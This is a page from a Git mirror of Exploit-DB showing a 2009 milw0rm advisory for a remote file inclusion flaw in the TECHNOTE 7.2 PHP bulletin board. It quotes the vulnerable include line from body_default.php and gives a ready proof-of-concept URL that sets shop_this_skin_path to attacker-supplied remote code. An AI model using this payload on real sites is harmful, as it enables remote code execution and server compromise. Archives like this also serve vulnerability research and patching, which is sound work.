bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/7965.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

28 lines
No EOL
810 B
Text
Raw Blame History

TECHNOTE 7.2 (08.09.25) Remote File Inclusion Vulnerability
bY make0day@gmail.com
/*************************
TECHNOTE (VERSION 7.2 (08.09.25))is bulletin board system of Korea.
It is freely available for all platforms that supports PHP and MySQL.
But I find Remote File Inclusion vulnerability.
Here is the details:
**************************/
TEST ON VERSION TECHNOTE 7.2 (08.09.25)
Download : http://www.technote.co.kr/
/***************************
Remote File Inclusion Vulnerability
/body_default.php
if($GOODS['gs_input']) include "$shop_this_skin_path/2_view_body/include/form_option.php";
//File Include
*************************/
poc:
http://[site]/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=[RFI]
# milw0rm.com [2009-02-03]
Reference in a new issue View git blame Copy permalink